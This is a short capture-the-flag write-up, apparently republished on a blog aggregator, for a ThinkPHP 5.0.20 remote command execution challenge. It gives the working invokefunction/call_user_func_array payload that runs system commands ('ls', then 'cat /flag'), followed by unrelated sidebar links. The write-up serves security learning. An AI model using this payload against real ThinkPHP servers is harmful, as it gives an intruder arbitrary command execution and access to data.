当前位置:网站首页>Attack and defense world web master advanced area PHP_ rce
Attack and defense world web master advanced area PHP_ rce
2022-07-29 00:17:00 【Ant200】
Tools
firefox
1. Open the link , Observed that this is a Think PHP V5 frame
2. Try typing index.php, Found that the page did not change , Continue to input the next level file ( Input at will ), Found out the version 5.0.20
3. Query the vulnerability of the relevant version ( Baidu or github) You can try 、
Query to the payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
Put it in and try to find something you can use
ls It's a system command , We just need to change the system command to open flag Just file
structure payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
4. The query is successful , find flag.
Relevant boss resources :
Attack and defend the world web Advanced master php_rce, Attack and defend the world web Master advanced area 1-5 2020.6.11_ Hazelnut is on the glowing blog -CSDN Blog
php Command execution exploit ,ThinkPHP 5.0 & 5.1 Remote command execution vulnerability analysis _AI Zhongzhi new media a Rong's blog -CSDN Blog
边栏推荐
- 1-7 解决类中方法的this指向问题
- Feign call fails. JSON parse error illegal character ((ctrl-char, code 31)) only regular white space (R
- 动态规划问题(七)
- Laptop external display
- Web系统常见安全漏洞介绍及解决方案-CSRF攻击
- 1-7 solve the problem of this pointing of methods in classes
- How NAT configures address translation
- Real time data warehouse: meituan's implementation of real-time data warehouse construction based on Flink
- [TA frost wolf _may- "hundred people plan"] art 2.2 model basis
- Develop effective Tao spell
猜你喜欢
Web系统常见安全漏洞介绍及解决方案-CSRF攻击
VMware VCSA 7.0 Install
Servlet operation principle_ API details_ Advanced path of request response construction (servlet_2)
curl (7) Failed connect to localhost8080; Connection refused
Okaleido ecological core equity Oka, all in fusion mining mode
JS advanced ES6 ~ es13 new features
Servlet运行原理_API详解_请求响应构造进阶之路(Servlet_2)
Idea2021.2 installation and configuration (continuous update)
PHP语言基础知识(超详细)
Compilation principle research study topic 2 -- recursive descent syntax analysis design principle and Implementation
随机推荐
PHP语言基础知识(超详细)
DoIP测试开发实践
Web系统常见安全漏洞介绍及解决方案-CSRF攻击
How can Plato obtain premium income through elephant swap in a bear market?
【C】 Introduction and Simulation Implementation of ATOI and offsetof
html+css+php+mysql实现注册+登录+修改密码(附完整代码)
Pycharm configuring the running environment
Virtual lab basic experiment tutorial -8. Fourier transform (1)
Please briefly describe the respective characteristics of list, set and map type sets (briefly describe three different inheritance methods)
【C】替换空格,宏实现整数的二进制奇偶位交换
EN 12101-8:2011 smoke dampers for smoke and heat control systems - CE certification
基于 FPGA 实现数字时钟详细原理讲解及验证结果
【TA-霜狼_may-《百人计划》】美术2.2 模型基础
PMP Exam countdown, look at 3A pass bag!
Do you know any formal part-time platforms?
Compilation principle research study topic 2 -- recursive descent syntax analysis design principle and Implementation
Solution: direct local.Aar file dependencies are not supported when building an aar
Eye of depth (18) -- partial derivative
Plato farm is expected to further expand its ecosystem through elephant swap
动态规划问题(七)